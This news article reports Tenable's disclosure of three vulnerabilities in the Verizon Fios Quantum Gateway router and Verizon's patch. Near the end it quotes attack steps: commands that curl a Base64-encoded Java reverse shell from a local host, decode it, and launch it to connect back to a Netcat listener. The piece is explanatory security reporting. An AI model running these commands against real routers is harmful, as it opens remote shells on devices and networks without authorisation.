A vulnerability in Verizon Fios Quantum Gateway–a Wi-Fi router often provided to customers of Verizon’s fiber-optic internet service–allows attackers to gain root privileges, with a significant amount of effort. The vulnerability was discovered by Chris Lyne at Tenable Research, and was discovered alongside a login replay and password salt disclosure vulnerability, the trio of which are designated as CVE-2019-3914, CVE-2019-3915 and CVE-2019-3916.
Gaining root access on a router can provide attackers an entry point to target other devices on the network, particularly Internet of Things (IoT) devices, which often lack their own security measures. Gaining root access can also be leveraged to capture information transmitted on the network, such as banking credentials. This is particularly concerning in a business setting, where a malicious party gaining root access to a router could potentially compromise an entire company’s network.
In April 2018, the Department of Homeland Security (DHS), Federal Bureau of Investigation (FBI), and the UK’s National Cyber Security Centre (NCSC) issued a joint statement warning of state-sponsored hackers leveraging vulnerabilities in routers, with the highly-publicized Slingshot and VPNFilter malware families discovered the same year.
SEE: Securing IoT in your organization: 10 best practices (free PDF) (TechRepublic)
Tenable notes that the Verizon Fios Quantum Gateway was co-developed by Greenwave Systems on their AXON platform, and that Greenwave and Verizon “[created] a patch in a timely manner.” Verizon started deployment of the patch–version 02.02.00.13–on March 13, and is installed automatically on affected devices.
How the exploit works
Surfacing this exploit shows a great deal of security hardening that Greenwave and Verizon put into the router. Tenable’s full explanation provides greater detail, and potential attack scenarios–all of which require insider access, or rely on social engineering to convince someone with insider access to provide sufficient detail to allow for remote exploitation.
The shell provided when SSH is opened (not a default configuration) is a relatively limited version of BusyBox, though the inclusion of a JVM provided a means to upload a reverse shell, which is explained in brief here:
- cd /mnt/config
- First the working directory is changed to the writable /mnt/config directory.
- curl http://192.168.1.191:8080/ -o sh_b64
- Next curl is used to download the Base64 encoded Java reverse shell class. It is saved as a file named ‘sh_b64’. Remember, the listener returns this
- base64 -d sh_b64 > ReverseTcpShell.class
- The ‘sh_b64’ file is Base64 decoded and written as ‘ReverseTcpShell.class’.
- /usr/local/jvm/bin/siege ReverseTcpShell 192.168.1.191 4444 &
- Finally, the ReverseTcpShell class is launched using the ‘siege’ embedded JVM. This will connect back to the Netcat listener at IP 192.168.1.191 listening on TCP port 4444. This process is backgrounded (&).
For more on the importance of router security, check out ” Vulnerability in MikroTik RouterOS enables easily exploitable denial of service attack.”